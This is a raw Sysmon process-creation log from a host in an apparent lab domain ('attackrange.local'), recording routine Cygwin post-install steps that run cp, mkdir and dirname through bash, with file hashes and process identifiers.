14:56:00.491{A8622C2F-5400-6078-920B-00000000AE01}1496C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-910B-00000000AE01}6032C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055533Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.483{A8622C2F-5400-6078-910B-00000000AE01}6032C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055522Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.475{A8622C2F-5400-6078-900B-00000000AE01}5220C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-8F0B-00000000AE01}6592C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055512Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.468{A8622C2F-5400-6078-8F0B-00000000AE01}6592C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055501Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.460{A8622C2F-5400-6078-8E0B-00000000AE01}6240C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-8D0B-00000000AE01}1844C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055491Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.452{A8622C2F-5400-6078-8D0B-00000000AE01}1844C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055478Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.443{A8622C2F-5400-6078-8C0B-00000000AE01}5084C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-8B0B-00000000AE01}5964C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055468Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.435{A8622C2F-5400-6078-8B0B-00000000AE01}5964C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055457Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.427{A8622C2F-5400-6078-8A0B-00000000AE01}4696C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-890B-00000000AE01}6672C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055447Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.420{A8622C2F-5400-6078-890B-00000000AE01}6672C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055436Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.412{A8622C2F-5400-6078-880B-00000000AE01}6076C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-870B-00000000AE01}1028C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055426Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.404{A8622C2F-5400-6078-870B-00000000AE01}1028C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055413Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.394{A8622C2F-5400-6078-860B-00000000AE01}1392C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-850B-00000000AE01}1348C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055403Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.386{A8622C2F-5400-6078-850B-00000000AE01}1348C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055392Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.378{A8622C2F-5400-6078-840B-00000000AE01}3200C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-830B-00000000AE01}5664C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055382Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.371{A8622C2F-5400-6078-830B-00000000AE01}5664C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055371Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.363{A8622C2F-5400-6078-820B-00000000AE01}3208C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-810B-00000000AE01}924C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055361Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.355{A8622C2F-5400-6078-810B-00000000AE01}924C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055348Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.346{A8622C2F-5400-6078-800B-00000000AE01}6552C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-7F0B-00000000AE01}5344C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055338Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.338{A8622C2F-5400-6078-7F0B-00000000AE01}5344C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055327Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.330{A8622C2F-5400-6078-7E0B-00000000AE01}4268C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-7D0B-00000000AE01}6032C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055317Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.322{A8622C2F-5400-6078-7D0B-00000000AE01}6032C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055306Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.314{A8622C2F-5400-6078-7C0B-00000000AE01}5516C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-7B0B-00000000AE01}6592C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055296Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.306{A8622C2F-5400-6078-7B0B-00000000AE01}6592C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055283Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.297{A8622C2F-5400-6078-7A0B-00000000AE01}6440C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-790B-00000000AE01}1844C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055273Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.289{A8622C2F-5400-6078-790B-00000000AE01}1844C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055262Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.282{A8622C2F-5400-6078-780B-00000000AE01}7140C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-770B-00000000AE01}5964C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055252Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.274{A8622C2F-5400-6078-770B-00000000AE01}5964C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055241Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.266{A8622C2F-5400-6078-760B-00000000AE01}5828C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-750B-00000000AE01}6672C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055231Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.258{A8622C2F-5400-6078-750B-00000000AE01}6672C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055218Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.249{A8622C2F-5400-6078-740B-00000000AE01}5744C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-730B-00000000AE01}1028C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055208Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.241{A8622C2F-5400-6078-730B-00000000AE01}1028C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.234{A8622C2F-5400-6078-720B-00000000AE01}4476C:\cygwin64\bin\mkdir.exe-----"C:\cygwin64\bin\mkdir.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=43A2242A9A00207A5151EFDFE7D5F1CC,SHA256=4D58077C681B1CBF1AC4DA590A8B62793DDE0985512D6388E6336E29787BDBDE,IMPHASH=0D7E7D292EB4263C4CC1C956F7B5986F{A8622C2F-5400-6078-710B-00000000AE01}1348C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055187Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.226{A8622C2F-5400-6078-710B-00000000AE01}1348C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055176Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.218{A8622C2F-5400-6078-700B-00000000AE01}6580C:\cygwin64\bin\dirname.exe-----"C:\cygwin64\bin\dirname.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=A84314B8BECFF78D8B5E0CA826F03EC6,SHA256=AAB8A23A51886A20562D5B3AAAC00783F10BDC1580AE06E9D05A1643A96E4F1C,IMPHASH=210178600FC4F306F06ABF8ABCF147D6{A8622C2F-5400-6078-6F0B-00000000AE01}6700C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055166Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.210{A8622C2F-5400-6078-6F0B-00000000AE01}6700C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055153Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.201{A8622C2F-5400-6078-6E0B-00000000AE01}2408C:\cygwin64\bin\cp.exe-----"C:\cygwin64\bin\cp.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=D65A875D91ECD4B5C0AB5E9D756E7627,SHA256=0572CDC8657D5F58423216D9E8EFA613EE22633571B6CEC7689888AE1A1D194F,IMPHASH=B3F0A23F2646ADA5A25EDB28C3DCB675{A8622C2F-5400-6078-6D0B-00000000AE01}3008C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055143Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:56:00.194{A8622C2F-5400-6078-6D0B-00000000AE01}3008C:\cygwin64\bin\bash.exe-----C:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=3F97459F21CAC8040D83AE12C5C0E6C1,SHA256=78D1760E7EAD9D594CB0183E9632AF761DF9D4C46714BB92086D5DE99351050D,IMPHASH=E8D8802100FAA877AC12771D566353AC{A8622C2F-5400-6078-610B-00000000AE01}1156C:\cygwin64\bin\bash.exeC:\cygwin64\bin\bash.exe --norc --noprofile "/etc/postinstall/base-files-profile.sh" 154100x800000000000000055132Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 